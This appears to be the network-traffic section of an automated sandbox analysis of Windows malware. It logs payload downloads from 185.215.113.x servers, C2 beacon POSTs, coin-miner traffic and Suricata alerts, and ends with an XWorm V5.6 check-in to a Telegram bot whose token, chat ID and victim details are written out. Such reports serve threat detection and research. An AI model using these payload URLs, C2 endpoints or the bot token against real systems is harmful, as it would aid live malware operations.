Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 33 35 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070035101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 33 36 30 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070036021&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/uniq.exe HTTP/1.1Host: 185.215.113.97If-Modified-Since: Thu, 06 Feb 2025 17:47:21 GMTIf-None-Match: "67a4f5a9-c7600"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070037001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5643377291/7fOMOTQ.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070040001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6691015685/1VB7gm8.exe HTTP/1.1Host: 185.215.113.97If-Modified-Since: Fri, 07 Feb 2025 10:42:01 GMTIf-None-Match: "67a5e379-1aec00"
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070041001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/1415984330/MvowLGc.exe HTTP/1.1Host: 185.215.113.97If-Modified-Since: Fri, 07 Feb 2025 15:24:22 GMTIf-None-Match: "67a625a6-1c800"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070042001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5801179114/5FheP4L.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070046001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5801179114/5FheP4L.exe HTTP/1.1Host: 185.215.113.97If-Modified-Since: Fri, 07 Feb 2025 16:18:20 GMTIf-None-Match: "67a6324c-222000"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 34 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070047001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 35 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070052001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/SQL_gulong1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 35 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070053001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/osint1618/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 30 30 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1070054001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 103.84.89.222:33791Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 103.84.89.222:33791Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 103.84.89.222:33791Content-Length: 3602958Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 103.84.89.222:33791Content-Length: 3602950Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49844 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49874 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49892 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49898 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49913 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49912 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49932 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49939 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49948 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49967 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49971 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49986 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50001 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50003 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50007 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50010 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50024 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50030 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50023 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50035 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50041 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50047 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50053 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50058 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50059 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50062 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50066 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50071 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50078 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50076 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50064 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50084 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50072 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50085 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50074 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50081 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50082 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50090 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50077 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50086 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50075 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50089 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50091 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50092 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50094 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50098 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50104 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50057 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50067 -> 172.67.139.208:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50145 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50151 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50168 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50167 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50183 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50186 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50191 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50190 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50188 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50196 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50197 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50201 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50202 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50204 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50207 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50217 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50221 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50223 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50224 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50227 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50231 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50232 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50236 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50237 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50239 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50241 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50245 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.6:54241 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50252 -> 172.67.150.254:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50229 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.6:50286 -> 192.248.189.11:443

Source: unknown	HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49780 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.26.13.31:443 -> 192.168.2.6:50242 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.97

Source: global traffic	HTTP traffic detected: GET /sok33tn HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: vikine.restConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEI3L3NAQiQys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEI3L3NAQiQys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bot7567333742:AAHDfYPeN-w99Wqz2UqIryCqnJvB1iXUejw/sendMessage?chat_id=4697473917&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A266ED6D2089A0068F98E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20N52WZ8WV%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
